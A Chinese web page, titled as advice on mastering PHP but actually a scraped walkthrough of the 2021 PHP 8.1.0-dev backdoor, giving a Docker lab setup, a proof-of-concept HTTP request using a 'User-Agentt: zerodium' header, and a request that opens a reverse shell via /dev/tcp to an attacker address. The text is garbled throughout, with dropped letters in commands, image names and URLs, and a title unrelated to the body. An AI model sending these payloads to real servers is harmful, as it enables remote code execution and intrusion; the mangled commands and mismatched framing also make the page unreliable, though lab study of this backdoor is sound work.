卡卷网
当前位置:卡卷网 / 每日看点 / 正文

怎样深入学习php,成为php高手?

作者:卡卷网发布时间:2025-01-01 15:21浏览数量:87次评论数量:0次

简介

PHPverion8.1.0-dev于2021年3月28与后门一起发布,但是后门很快被发现并删除。

#漏洞概述

PHPverion8.1.0-dev的PHP在上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。

#影响版本

PHP8.1.0-dev

#环境搭建

新建docker-compose.yml

version:'2' servs: we: image:vulhu/php:8.1-ackdoor volumes: -./index.php:/var/www/html/index.php ports: -"8080:80"

启动环境

docker-composeup-d

#漏洞复现

#poc验证

在header头增加user-agentt字段,值为:zerodiumvar_dump(2*3);

GET//1.1 Host:192.168.81.223:8800 Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 user-agentt:zerodiumvar_dump(2*3); Connection:close

如果执行了这个表达式,说明存在漏洞

#执行命令反弹shell

GET//1.1 Host:192.168.81.223:8800 Praa:no-cache Cache-Control:no-cache Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate User-Agentt:zerodium("ash-c'execash-i>&/dev/tcp/ip/66660>&1'"); Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 Connection:close

#事件分析与反思

代码中含有”zerodium”字符串,而zerodium是一个专门漏洞的.在此事件中,怀疑黑客攻陷了://git.php.net,以PHP作者的名义做了两次代码提交。

#参考文章

s://log.dn.net/zy15667076526/article/details/116447864

END

免责声明:本文由卡卷网编辑并发布,但不代表本站的观点和立场,只提供分享给大家。

评论 打赏
卡卷网

卡卷网 主页 联系他吧

请记住:卡卷网 Www.Kajuan.Net

相关推荐

欢迎 发表评论:

请填写验证码